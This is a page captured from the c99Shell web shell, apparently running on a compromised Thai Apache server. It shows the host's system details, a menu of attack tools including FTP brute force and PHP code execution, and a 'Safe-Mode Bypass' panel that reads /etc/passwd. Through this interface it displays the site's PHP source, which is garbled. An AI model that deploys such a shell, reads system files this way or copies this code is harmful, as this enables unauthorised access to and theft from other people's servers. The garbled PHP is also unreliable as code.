!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PlanCode.php (7.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../link/function.php");
 include(
"../include/FunctionDB.php");
 include(
"../include/Function.php");
ConnectDB();

$strSQL "SELECT * FROM    projectstdplan_tb   GROUP BY   Budget_Year  ";
if (! 
$Page)
$Page 1;
$Pre_Page $Page 1;
$Next_Page $Page +1;
$Per_Page 50;
$result mysql_query($strSQL);
$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows mysql_num_rows($result);
if( 
$Num_Rows <= $Per_Page)
   
$Num_Pages 1;
else if ((
$Num_Rows $Per_Page) == 0)
       
$Num_Pages = ($Num_Rows $Per_Page);
else
        
$Num_Pages = ($Num_Rows $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;

if (( 
$Page $Num_Pages) || ($Page 0))
  echo
"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result mysql_query($strSQL); 
$num mysql_num_rows($result );
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>รายละเอียดโควตา</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style23 {font-size: 14px}
.style24 {color: #000000}
-->
</style>

<!---------------------------------------Begin JavaScript---------------------------------------->
<SCRIPT LANGUAGE="JavaScript" src="../source/script.js"></SCRIPT>
<script language="JavaScript">

    function ReturnValue(code,No_in)

    {
     //    if(id == 1){
            window.opener.document.form1.code.value = code;
            window.opener.document.form1.No_in.value = No_in;            
             window.close();        
        
        }
        /*
        if(id == 2){
            window.opener.document.pc.quotaId2.value = quotaId;
            window.opener.document.pc.provinceId2.value = provinceId;
        }
        if(id == 3){
            window.opener.document.pc.quotaId3.value = quotaId;
            window.opener.document.pc.provinceId3.value = provinceId;
        }
        if(id == 4){
            window.opener.document.pc.quotaId4.value = quotaId;
            window.opener.document.pc.provinceId4.value = provinceId;
        }
        if(id == 5){
            window.opener.document.pc.quotaId5.value = quotaId;
            window.opener.document.pc.provinceId5.value = provinceId;
        }
        if(id == 6){
            window.opener.document.pc.quotaId6.value = quotaId;
            window.opener.document.pc.provinceId6.value = provinceId;
        }
        if(id == 7){
            window.opener.document.pc.quotaId7.value = quotaId;
            window.opener.document.pc.provinceId7.value = provinceId;
        }
        if(id == 8){
            window.opener.document.pc.quotaId8.value = quotaId;
            window.opener.document.pc.provinceId8.value = provinceId;
        }
        if(id == 9){
            window.opener.document.pc.quotaId9.value = quotaId;
            window.opener.document.pc.provinceId9.value = provinceId;
        }
        if(id == 10){
            window.opener.document.pc.quotaId10.value = quotaId;
            window.opener.document.pc.provinceId10.value = provinceId;
        }
        if(id == 11){
            window.opener.document.pc.quotaId11.value = quotaId;
            window.opener.document.pc.provinceId11.value = provinceId;
        }
        if(id == 12){
            window.opener.document.pc.quotaId12.value = quotaId;
            window.opener.document.pc.provinceId12.value = provinceId;
        }
        window.opener.document.pc.No_in.value = No_in;
            window.opener.document.pc.provinceName.value = provinceName;
    if(id == 1 && window.opener.document.pc.countQuota.value == 1){
    window.opener.document.pc.quotaName.value = quotaTypeName;        
    window.opener.document.pc.provinceName.value = provinceName;
        }    
    if((id != 1 || id == 1) && window.opener.document.pc.countQuota.value != 1){
        window.opener.document.pc.quotaName[id-1].value = quotaTypeName;        
    window.opener.document.pc.provinceName[id-1].value = provinceName;
        }    
        window.close();                
    }
*/
</script>

</head>
<form name="pc" action="<?php echo $PHP_SELF?>" method="post">
  <div align="center">
    <table width="86%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray">
      
      <tr bgcolor="#E6E6E6">        
        <td width="973" align="center" style="border:1px solid gray"><span class="style23"><font color="#000000" face="Tahoma">ปีงบประมาณ</font></span></td>
      </tr>
      <?php
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
      <tr bgcolor="#F7F7F7" >        
        <td align="left" bgcolor="#FFFFFF"><font face="Tahoma"><span class="style24">ปีงบประมาณ&nbsp;&nbsp;</span></font><font color="#996600" face="Tahoma"></span></font><font color="#996600" size="2" face="Tahoma"></a></a></font><font color="#996600" size="2" face="Tahoma"><a href="PlanCodeDetail.php?Budget_Year=<?=$row["Budget_Year"?>&Flag=Y "title="Click to see Detail" class="d" >
         <?=$row["Budget_Year"]?>
        </a></font></td>
      </tr>
      <?
    $count
=1;
     }
else
{
?>
      <tr bgcolor="#FFFFFF">        
      <td bgcolor="#ECF5FF"><font face="Tahoma"><span class="style24">ปีงบประมาณ&nbsp;&nbsp;</span></font><font color="#996600" face="Tahoma"></span></font><font color="#996600" size="2" face="Tahoma"></a></a></font> <font color="#996600" size="2" face="Tahoma"><a href="PlanCodeDetail.php?Budget_Year=<?=$row["Budget_Year"?>&Flag=Y "title="Click to see Detail" class="d" >
      <?=$row["Budget_Year"]?>
        </a></font></td>
      </tr>
      <?
$count
=0;
}
$i++;
 }    
?>            
      <tr bgcolor="#CCCCFF">
        <td height="25" align="center" bgcolor="#FFFFFF" ><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#003399" size="2" face="Tahoma"> <? echo $num ?> </font><font color="#003366" size="2" face="Tahoma"> ปี </font></strong></div></td>
         <tr>
           <td height="24" align="center"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC"><font color="#FFFFFF"><font color="#FFFFFF" size="3" face="MS Sans Serif"><strong><font color="#0033CC" size="2" face="Tahoma"><?php echo $Num_Pages;?></font></strong></font></font><font size="2" face="Tahoma">&nbsp;</font></font></strong></font><font color="#000000" size="2" face="Tahoma"><strong> หน้า</strong></font> <font color="#0033CC" size="1" face="Tah<?php echo $Num_Pages;?>oma"><strong>
          <?php
if ($Pre_Page)
   echo
"<a href=\"$PHP_SELF?Page=$Pre_Page&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";

   for(
$i=1;$i<=$Num_Pages;$i++)
   {
    if(
$i != $Page)
         echo
" [<a href=\"$PHP_SELF?Page=$i&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
    else
        echo
"<b>$i</b>";
   }
if(
$Page != $Num_Pages)
 echo
"<a href=\"$PHP_SELF?Page=$Next_Page&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";
 
?>
        </strong></font> </font>
               <input name="code" type="hidden" id="code" value="<? echo $rs["code"]?>">
           </div></td>
      </tr>
         
         <tr>
           <td align="center"><a href="#" onClick="window.close()"><font face="Microsoft Sans Serif" size="1">[ปิดหน้านี้]</font></a></td>
         </tr>
      <tr>
      <td height="2">      </tr>
    </table>
  </div>
</form>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0119 ]--